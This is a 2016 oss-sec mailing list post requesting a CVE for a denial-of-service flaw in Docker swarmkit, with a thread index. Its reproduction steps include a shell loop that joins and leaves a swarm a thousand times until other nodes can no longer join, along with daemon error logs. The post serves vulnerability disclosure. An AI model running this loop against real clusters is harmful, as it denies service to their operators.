oss-sec mailing list archives
cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node
From: 张开翔 <zhangkaixiang () 360 cn>
Date: Fri, 29 Jul 2016 09:47:31 +0000
Docker swarmkit is used to form a swarm, coordinating tasks. Once a machine joins, it becomes a Swarm Node. Nodes can either be worker nodes or manager nodes. I found a vulnerability in docker of the latest version which could cause a Denial of Service, it results in a machine could not join the swarm cluster after another node’s repeatedly joining and quitting the swarm for many times(taking my testing as example , it should need at least one thousand times. )Moreover, the docker debugging info indicates the Dispatcher is stopped and ca server may exited sometimes. # docker version Client: Version: 1.12.0-dev API version: 1.25 Go version: go1.6.3 Git commit: 9c1be54-unsupported Built: Fri Jul 29 15:40:52 2016 OS/Arch: linux/amd64 Server: Version: 1.12.0-dev API version: 1.25 Go version: go1.6.3 Git commit: 9c1be54-unsupported Built: Fri Jul 29 15:40:52 2016 OS/Arch: linux/amd64 # docker swarm init Swarm initialized: current node (23m6ksr96whsvuo8lzokenju3) is now a manager. To add a worker to this swarm, run the following command: docker swarm join \ --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \ xx.xx.xx.xx:2377 To add a manager to this swarm, run the following command: docker swarm join \ --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-0p086z2sdbnpvognjmu76gpi6 \ xx.xx.xx.xx :2377 Login machine A1 and join the swarm ,and then quitted the swarm. ----------------------------------------------------- # docker swarm join --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 xx.xx.xx.xx:2377 This node joined a swarm as a worker. # docker swarm leave --force Node left the swarm. Login machine A2 , repeatedly join and quit the swarm for 1000 times. ----------------------------------------------------- # for i in {1..1000}; do docker swarm leave --force ; docker swarm join --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 xx.xx.xx.xx:2377 ;done This node joined a swarm as a worker. Node left the swarm. This node joined a swarm as a worker. Node left the swarm. This node joined a swarm as a worker. Node left the swarm. This node joined a swarm as a worker. Node left the swarm. This node joined a swarm as a worker. Node left the swarm. After finishing that, Login machine A1 again and attempt to join the swarm, it failed. -------------------------------------------------------- # docker swarm join --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 xx.xx.xx.xx:2377 Error response from daemon: Timeout was reached before node was joined. Attempt to join the cluster will continue in the background. Use "docker info" command to see the current swarm status of your node. Some debugging information of docker daemon. --------------------------------------------------------- time="2016-07-29T15:24:02.374560815+08:00" level=error msg="failed to remove node" error="rpc error: code = 10 desc = dispatcher is stopped" method="(*Dispatcher).Session" node.id=b11ta5p8g2wgy10vyzgsi6ocm node.session=1aph8scsewn89j3h5o3emgdql time="2016-07-29T15:24:02.374604898+08:00" level=error msg=" session failed" error="rpc error: code = 1 desc = context canceled" module=agent time="2016-07-29T15:24:14.069347074+08:00" level=debug msg="heartbeat expiration" time="2016-07-29T15:24:14.069428834+08:00" level=error msg="failed deregistering node after heartbeat expiration" error="rpc error: code = 10 desc = dispatcher is stopped" … … Please assign CVE IDs for the security issue ? Best regards& Kaixiang Zhang of the Cloud Security Team, Qihoo 360
Current thread:
- cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node 张开翔 (Jul 29)
- Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node cve-assign (Aug 03)
- <Possible follow-ups>
- Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Diogo Mónica (Sep 01)
- Re: Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Kurt Seifried (Sep 01)
- Re: Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Diogo Monica (Sep 01)
- Re: Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Kurt Seifried (Sep 01)
- Re: Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Diogo Mónica (Sep 02)
- Re: Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Kurt Seifried (Sep 02)
- Re: Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Diogo Mónica (Sep 05)
- Re: Re: cve request: docker swarmkit Dos occurs by repeatly joining and quitting swam cluster as a node Kurt Seifried (Sep 01)